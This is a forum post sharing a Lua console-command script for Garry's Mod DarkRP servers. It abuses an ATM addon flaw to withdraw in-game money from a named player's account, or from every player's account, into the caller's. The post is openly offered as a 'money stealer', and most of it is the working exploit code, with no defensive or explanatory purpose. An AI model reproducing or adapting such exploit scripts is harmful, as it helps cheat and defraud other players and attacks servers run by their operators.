Money stealer I posted a while ago but got deleted. Not going to risk a ban again so I'll just provide the script.
Description: Note: Works only on some servers using the darkrp atm addon, some servers fixed this exploit already.
To steal money from a specific person, run this console command: atm_getmoney [name of person] [amount of money you want to steal]
(this was made by a facepunch user)
To steal money from every account, run this console command: atm_takemoney [amound of money you want to take from every account]
(made by me, but based off of the above)
Errors will appear.
Credits: Random facepunch user + me
Code:
concommand.Add( "atm_getmoney", function(ply, cmd, args)
local name = args[1]
local money = args[2]
if not money or not name then
chat.AddText( nil, cmd.." name money" )
return
end
local vict
for k,v in pairs(player.GetAll()) do
if string.find( v:Nick(), name ) then
vict = v
break
end
end
if not IsValid(vict) then
chat.AddText( nil, "No player found with "..name.." in their name." )
return
end
chat.AddText( nil, "Attempting to take $"..money.." from "..vict:Nick().."." )
RunConsoleCommand( "rp_atm_withdraw", "", vict:UniqueID(), money )
end )
concommand.Add("atm_takemoney", function(players, command, args)
for k, v in pairs(player.GetAll()) do
RunConsoleCommand("atm_getmoney", ""..v:GetName().."", args[1])
end
end)